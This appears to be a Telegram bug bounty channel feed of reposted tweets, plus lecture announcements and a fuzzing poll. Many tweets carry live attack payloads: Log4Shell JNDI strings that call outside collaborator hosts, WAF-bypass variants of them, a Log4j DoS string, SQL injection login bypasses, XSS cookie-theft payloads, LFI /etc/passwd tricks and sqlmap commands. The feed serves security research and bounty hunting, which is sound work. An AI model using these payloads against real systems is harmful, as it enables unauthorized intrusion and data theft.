Bug Hunting Hub
The source of insights for Bug Hunters. The channel is driven by a bot, curated by twitter.com/makrushind
instagram.com/makrush.in
Having designed the “Application Security Fundamentals” course for Information Security students of my alma mater, I'm giving back and, together with my friends from industry, cultivating the design thinking of the next generation of alumni: shifting the mindset from problem discovery to solution architecture.

Three years after launching, to increase the impact of this course, we made our lectures open to every Russian-speaking student. Just register using the link and wait for the announcement of the open lecture tomorrow.

The photo illustrates what a typical class looks like: somewhere with a laptop. Grab your device, headset and join!

Spoiler: tomorrow at 6:00 pm (GMT+3) Daniil Bannykh, our Bug Hunting Hub master, will share "Stateful API Fuzzing: Challenges, Tactics and Tools" (Russian language).

Registration: https://t.me/+xbXoZrK5pV9iMmEy
#BugBountyTips of the Day
Find domains of different extensions wget -q -O - "https://t.co/Zk0k5u9Oyz" | sed 's/FUZZ/www.DOMAIN/g' | httpx -title -status-code -location @DragonJAR #cybersecurity #bugbounty #bugbountytips #infosec #pentest https://t.co/EFGZsWEnFa
---
⭐️⭐️⭐️#Pro Cloudflare SQLi Bypass by 'Cyber Guy' #WAFBypass #SQLi #BugBounty #BugBountyTip #BugBountyTips https://t.co/EsvOOXoMVs
---
hello @pdnuclei @pdiscoveryio - community, we made you a cookie and hope you like it https://t.co/KOawiyCn4Y #dfir #bughunting #blueteam #bugbounty https://t.co/QZc6OLBfah
---
scrape subdomains from SSL certs with cero ssl_scrape(){ whois -h https://t.co/qmduAl3QtJ -- "-i origin $1" | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq | mapcidr -silent | cero -c 500 -d -p 443,8443,10443 | tee -a output.txt } #bugbounty #cybersecuriy #infosec https://t.co/Y3PPGTNgDI
---
If you're hunting for low-hanging bugs in source code, grep and regex can help you to identify hotspots. For example, you might find basic rXSS in PHP with something like this: grep -r "echo.*\$_\(GET\|REQUEST\|POST\)" . #BugBountyTips 🤗
#BugBountyTips of the Day
Great day to have a Bug Bounty program, instead of getting rekt in the weekend - you are patching a critical 0 day in a matter of hours and paying for it 5k$ max #BugBounty works. #log4j2
---
One-ish liner for #Log4J #RCE cat hosts.txt | sed 's/ https\?:\/\///' | xargs -I {} echo '{}/${jndi:ldap://{}.attacker.burpcollaborator.net}' >> log4j.txt httpx -l log4j.txt Look for callbacks in your server. It should be VICTIM.ATTACKER.burpcollab #bugbountytips #bugbounty
---
#bugbountytips #bugbounty File Upload to RCE #pentest #appsec 1. Bypass the filter upload 2. PHP Exploit 3. Remote Code Execution More.. https://t.co/c0E6voMAE3 https://t.co/IaHnoaGdfx
#BugBountyTips of the Day
Scanning Log4j RCE - CVE-2021-44228 using Nuclei Template shared by @_melbadry9 @daffainfo @DhiyaneshDK Template - https://t.co/w4bZ7RFAA1 Reference - https://t.co/szPUqUhNEB #hackwithautomation #bugbounty #pentest #security https://t.co/oOfLzdzk0w
---
Apache Log4j RCE Attack Flow - ExploitWareLabs #bugbountytips #bugbounty #log4j #CVE #cybersecurity #infosec https://t.co/bSKC3i6h1Y
---
Wohooo, Me and @theabrahack just got awarded a bounty of $15,000 on @Hacker0x01 for log4j RCE , I love how some companies treat zero days #bugbounty
---
How many times have you been overwhelmed yet when checking out JS files on a website? 😰 Be smart and analyse them in a structured way 🗽 @imranparray101 is here for you with some examples 💪 #bugbountytips 👇 https://t.co/Z3k6aUnehl
---
ADenum - A Pentesting Tool That Allows To Find Misconfiguration Through The Protocol LDAP And Exploit Some Of Those Weaknesses With Kerberos https://t.co/M1ymtVeeDs #cybersecurity #bugbountytips #hacking #tools https://t.co/AOjhxAG3T4
---
Don't forget to use the handy Burp Proxy Match and Replace rules for finding #Log4Shell, while browsing targets. Pretty simple but effective. #bugbountytips #bugbounty #infosec #cybersecurity #log4j https://t.co/HwRK0NxpaC
---
Log4j2 RCE Passive Scanner plugin for BurpSuite https://t.co/PwgT68Mu21 #bugbountytips #bugbounty #cybersecurity #CVE #java #infosec
---
I think I’m the first one to get bounty for log4j RCE , $300 on an Informative Report #bugbounty
#BugBountyTips of the Day
Verify Java Version, if not vulnerable don't bother and go to the next target! How? ${jndi:ldap://${env:JAVA_VERSION}.5ou7zt0bj640uqc0bsy1hvyrpiv8jx.burpcollaborator.net} #bugbountytips https://t.co/ZHxYVKD1ns
---
Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip https://t.co/ZhuA0WdzN7
---
If you have a Struts2 target, you can try to find if its vulnerable to #Log4Shell curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js #bugbountytips #log4jRCE #bugbounty #infosec #cybersecurity #redteam 1/n https://t.co/agUISHuQWF
---
This week is great so I can take a rest this month #bugbounty 👀 https://t.co/D80srO8hsC
---
~Admin Panel Accessed via sqli #bugbountytips @0xmahmoudJo0 1- Search for Login panels through @shodanhq with this dork: org:"TARGET" http.title:"login" 2- Bypass login with old way: admin' or 1=1 #BugBounty #bugbountytip #cybersecurity #sqli https://t.co/Tu4rn9gS0u
#BugBountyTips of the Day
The famous #log4j👀 #bugbounty https://t.co/XJ7H6zfGoH
---
403-bypass: a collection of wordlists, FFUF commands, and nuclei templates to bypass 403. 🔗 https://t.co/8jHoX0McY2 #bugbounty #cybersecurity #infosec #wordlists #403bypass
---
log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts #log4j #Log4Shell #infosec #log4j2 #bugbountytips #bugbounty https://t.co/LO8LQONozj
---
I just published a new write-up at Medium! How I found a IDOR issue in 5 mins? https://t.co/szEs07XZok Please ask through direct message if you have any question about bugbounty or information security! Have a great day y'all. :) #bugbounty #infosec #hackerone #bugbountytips https://t.co/51YYWizPpH
---
trying to test every header of a website for #log4j? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :) #bugbounty #bugbountytips https://t.co/E2TTRhRVlT
#BugBountyTips of the Day
XSS filter bypass payload: \"+confirm(1)+" #bugbountytips #bugbountytip #bugbounty #cybersecurity https://t.co/6BVE1ZBelv
---
So proud to announce that today I have completed my 2021 bug bounty goal of $40,000 by just working for 4 months , Happy to achieve this at the age of 17 , Goal is to be a millionaire by 20 , Big thanks to Bug Bounty @Hacker0x01 @SynackRedTeam #BugBounty
---
SQL Injection #bugbountytips #bugbountytip In username , email parameter login , signup , forget for #Oracle Add This Sleep Payload For Your SQL Payload List orwa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||' Happy Hunting Dears
---
Receiving dns response doesn't mean it's vulnerable. so, try this to verify it's vulnerable or not. ${env:JAVA_VERSION} ${sys:java.version} ${hostName} ${sys:java.vendor} #bugbountytip #bugbounty #bughunting #log4j2 #log4jshell #rce #vulnerability #Bug https://t.co/Qw5LvhsjAX
---
#BugBounty #cybersecurity Fuzz header body and path to find Log4j2 jndi injection https://t.co/sioDMttoqt https://t.co/gi80xsPjfp
---
Happy to be part of @Hacker0x01 All Time Top 100 Leaderboard 🙏 #BugBounty https://t.co/NAHCMBsJVd
#BugBountyTips of the Day
Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to share Akamai Bypass? #bugbountytips https://t.co/QaoavD326z
---
XSS filter bypass payload: @Mah3Sec_ \"+confirm(1)+" #bugbountytips #bugbountytip #bugbounty #cybersecurity https://t.co/wvEjQCjVVJ
---
What interesting variants of #Log4j payloads have you seen in the wild so far, in your SIEM/logs? 🧵 GET request parameter: ?x=${jndi:ldap://${hostName}.c6rdo2a9xxxxxxhyben.interactsh.com/a #infosec #cybersecurity #bugbounty #blueteam #log4shell 1/n https://t.co/P0edz3UTSC
#BugBountyTips of the Day
Are you ready to hunt for bugs in this program ? 50$ for critical 😄 #BugBounty https://t.co/ff3aa5Wg8U
---
(1/2) LFI WAF Bypass @TodayCyberNews file:/etc/passwd?/ file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/?/../passwd file:///etc/%3F/../passwd file:${br}/et${u}c/pas${te}swd?/ file:$(br)/et$(u)c/pas$(te)swd?/ #bugbounty #bugbountytips #infosec
---
Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDONTRELYONWAF https://t.co/7FmkM9mHZe
---
Pinaki (@0xInfection) from our team has written a fantastic tool 'Log4Hunt' to scan for #log4jshell vulnerability. It accepts a URL or a list of URLs as input and uses Canary Tokens (Thanks @ThinkstCanary) Happy Friday😎 https://t.co/MAVM3rfPqY #opensource #bugbounty
---
How I am able To Account Takeover Of @Pornhub ( Porn Creator ). Bounty :- $1,632 Bug is Bxss ( Send fake Copyright strike to Porn Creator with blind Xss Payload. ) #MrRajputHacker #bugbounty #bugbountytips #infosec #cybersecurity https://t.co/DvchUFTvbt
#BugBountyTips of the Day
In the username parameter 🎯 @0xFalah payload : <img src=xss onerror=alert(1)> #BugBounty #CyberSecurity #bugbountytips ( hackerone ) $450 😉 https://t.co/bVRIKf3rLb
---
Log4j 2.16 vulnerability DoS Payload: ${${::-${::-$${::-j}}}} refer to: https://t.co/c5oaWhQWVY #log4j #Log4Shell #log4Hell #BugBounty #bugbountytips https://t.co/Skl1FwQP1p
---
Why doing all the recon by yourself if it already has been done? 🤦‍♀️ Sometimes you just need the right tools 👨‍💻 And @rbhichher has one ready for you today 🎄 #bugbountytips 👇 https://t.co/nMWG4lN3pd
---
[Blog Post] Flickr: Zero User-Interaction Account Takeover 👉 https://t.co/sv9GGuCgfm 👉 https://t.co/fxj3griIHB #appsec #sso #aws #cognito #flickr #bugbounty https://t.co/Dq7ipDZKm4
---
Flickr disclosed a bug submitted by @_lauritz_: https://t.co/SFz2nfVeeZ - Bounty: $7,550 #hackerone #bugbounty https://t.co/QO3wzRilcu
#BugBountyTips of the Day
Log4J Vulnerability Flyer🔥Logs on Fire🔥 Covered in flyer: - Log4J - Lookup Plugins - JNDI Lookup - JNDI <-> LDAP Lookup - Working of attack Read Here : https://t.co/0AkX7IQBq2 #infosec #appsec #security #bugbountytips #bugbounty #Hackers #zine #webappsec #cybersecurity https://t.co/h9lftLFMbA
---
A tool for bug bounty recon #bugbounty #bughunting #recon #bug #tools #bugbountytips #bugbountytip #bugbountytool #bugbountytools LINK : https://t.co/wAVjdikrmY https://t.co/AAH6A2NzF6
---
https://t.co/Bnwt05dIJa New writeup for 2022! #BugBounty #bugbountytips #bugbountytip
---
The free webinar "Cracking Passwords with Rainbow Tables" is available on video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/Z9YRtclEDz https://t.co/Q3fpMwcrVU
---
New machine for the new year, M1 Max 16 Inch 32GB Ram, maybe now I can start using a certain tool named BurpSuite : ) #BugBounty https://t.co/gyNMxNSteW
---
Best Resources and Best Cyber Security Cheat Sheets Active Directory Cheat Sheet : https://t.co/s3XVbwWlD4 A Guide On Log4j Penetration Testing : https://t.co/nTPWj6agGJ #cybersecurity #BugBounty #bugbountytips @theXSSrat @ADITYASHENDE17 @zseano @NahamSec
---
Top 5 Bug Bounty Platforms! #cybersecurity #ethicalhacking #bugbounty #bugbountytips https://t.co/El8pE3aBSr
---
Yay, I was awarded 2,200 $ bounty from @zoho, I just achieved one of my 2021 bug bounty goals. $1,200 + 800$ + $200 2 RCE and 2 XSS "It always seems impossible until it's done" #bugbounty #infosec #bounty https://t.co/eWRDje3D61
---
The free webinar "Forensic Analysis of the Windows Firewall" is available on video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/P5qra0PY6R https://t.co/CCyMOvOqHf
---
5 ways to make money with #ethicalhacking 5) Repairing virus-ridden PC's/hacked networks 4) Pentesting 3) Making youtube videos about it 2) Writing medium articles about it 1) #BugBounty Good luck amazing hackers <3
#BugBountyTips of the Day
Tip? Use nuclei 😉 #bugbountytips https://t.co/smMR7oIfe1
---
Scan for MobileIron Log4J JNDI RCE using nuclei template shared by meme-lord Template - https://t.co/pLVs6GTjrF Reference - https://t.co/YHQ2Kdoc0I #hackwithautomation #bugbounty #pentest #security https://t.co/K0oLrahPiX
---
My First P1 Bounty 🎉🤩 I earned $2,500 for my submission on @bugcrowd https://t.co/X8dLRuhTUG #ItTakesACrowd #bugbounty #Hackers
#BugBountyTips of the Day
Working AWS/Cloudfront #log4j WAF Bypass within the URI path http:\/\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}} Please note that AWS WAF is self configurable, but I got hits on ~100 websites today with this payload. #BugBounty https://t.co/7awtKeCRbN
---
This is how it all Started, SS is for those who get demotivated after some attempts only. Starts may be small, don’t worry, you have started. @Bugcrowd @caseyjohnellis @aflores2424 @fransrosen @Jhaddix #bugbounty #infosecurity https://t.co/RmIgnkGDx6
---
You can inject header too with SQLi POC: sqlmap -u " https://t.co/KZfy5GompT" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10 Injection marker: * #bugbounty #bugbountytips https://t.co/YcLtF87ESu
---
My First #log4jrce on @Hacker0x01 😍😍😍 Log4j CVE-2021-44228 #bugbountytips #BugBounty #hackers #Log4Shell https://t.co/X25Z7afUN2
---
Yay, I was awarded a $5,120 bounty on @Hacker0x01 ! Bug : Complete Log4j RCE #TogetherWeHitHarder @Hacker0x01 #bugbounty Thanks @Hacker0x01 https://t.co/c9qPfR9HnV
---
My 2022 BugBounty Goals🎯: - 20k in Bounties - 2000 Reputation points on @Hacker0x01 - 20x swags from Sony (For local charity center) - 20x RedBull trays (For local charity center) - [Redacted] #bugbounty #togtherwehitharder
---
Python libraries and frameworks #MachineLearning #python #100Daysofcode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #DataScience #MachineLearning #NeuralNetworks #CES2022 #OpenSource #AI #5G #IoT #DEVCommunity #codinglife via @atishkumarjain https://t.co/T97il23Y6E
#BugBountyTips of the Day
If you collected a bunch of alive IP addresses, don't run @pdnuclei directly on them. First do a full port scan, then run it; maybe you'll find some juicy stuff on other ports, like what I got XD !! The command: https://t.co/cB2zpzZez2 #bugbountytips #BugBounty #CyberSecurity https://t.co/olc8Y72xpz
---
Android App Reverse Engineering 101 - by @maddiestone https://t.co/qa5V4R8d9N #bugbounty #android #cybersecurity #malware https://t.co/3SHMTZYOEg
---
In this post, we will discuss the many strategies that a pentester can employ to transfer data to the target PC ( Windows and Linux Machine). #bugbountytips #Linux #WebSecurity #cybersecurity #Ethicalhacking #hacking #Linux #itsecurity #infosec https://t.co/zlF9IFwutl
---
Massive Collection of all #MacOS And #IOS Related Vulnerabilities Docs in One Go! #infosec #bugbounty #bugbountytips https://t.co/fHl2WsXOjW
---
I earned $1,500 for my submission on @bugcrowd https://t.co/adNqMtGQMK #ItTakesACrowd Abusing an Open Redirection within the Oauth flow to steal the Google access token and login into the user's account. #cybersecurity #bugbounty #infosec #informationsecurity https://t.co/tKvaCXPdwZ
---
Web Cache Vulnerability Scanner #bugbounty #cybersecurity #infosec https://t.co/EYEoRslhiJ
#BugBountyTips of the Day
The free webinar "Google Hacking" is available on video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/kFwav2QUuw https://t.co/CIIZdK4zV0
---
“Decoding PDF Injection” by Urshila https://t.co/G0ruWowrhY #bugbounty #hacking #infosec
---
New #log4j 2.17.0 RCE may be assigned as CVE-2021-44832 #CVE-2021-44832 Vulnerability confirmed!!! #bugbounty #cybersecurity #apache
---
The free webinar "Exploitation with Kali Linux" is available on video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/0vytpnm8QY https://t.co/omdwhQ8hdD
---
Top 20 Most Popular Hacking Tools in 2021 https://t.co/TL3DTtNauI #cybersecurity #bugbountytips #hacking #tools https://t.co/ahxYRFWRIM
---
Here is my biggest 2021 goal. ...is completed In May 2021 I started the bug bounty ...and today I found my name in @GoogleVRP @Apple @Microsoft I'm always Thankful - my bro , my mentor - @ADITYASHENDE17 #bugbounty #bughunter https://t.co/kxUyjxVJGN
---
Reflected- Cross Site Scripting on login user account Payload : javascript:alert(1) javascript:alert(document.cookie) #bugbounty #bugbountytips https://t.co/nCw2T7TWdY
---
https://t.co/3r30wz8xys A simple website to guess API Key / OAuth Token When you do pentest / Github recon and find API key / OAuth token but you don't know what API key it is, you can use my website that I built from javascript #bugbountytips #bugbounty #infosec https://t.co/0I1LOdzkgs
---
after 5 months of break I am able to find something good 😀. The trending vulnerability. and got 🤑🤑 #Log4Shell #bugbounty #cybersecurity https://t.co/OVLjQCfQH9
---
XSS TIP : to bypass WAF @PecentZero Inserting space before (),[], . is allowed when execute command ,you can replace space with /**/ alert/**/("XSS") alert/**/?.("XSS") alert?./**/("XSS") alert/**/?./**/("XSS") window?./**/[/al/.source+/ert/.source]/**/('XSS') #bugbountytip
Open Lecture about fuzz-method
Anonymous Poll
Yes, go ahead! (89%)
Not interesting :( (11%)
Hello Bug Hunters!
As you know, for security testing we can use so many methods and techniques 🤓
And we want to ask you about one of them.. What do you know about methods of fuzz testing? 🤔
If you don't know anything about fuzzing or want to jump into this topic, we want to share with you an English-language Open Lecture ⚡️
Say "Yes" (!!!) if you're ready to gather more insights into fuzzing and check our poll for that! If we gain enough of an audience then we will organize the Webinar for Bug Hunting Hub and invite experts in fuzzing. 🕺
Go-go-go!
The "Prototype Pollution" research, performed with co-authorship and strong contribution by Nikita Stupin in the Advanced Security Research team, has been recognized by the community and nominated for the “Top 10 Web Hacking Techniques of 2021”.

This is the best opportunity for all bug hunters who found the research insightful, and especially those who got bounties based on it, to support the authors: https://portswigger.net/research/top-10-web-hacking-techniques-of-2021-nominations-open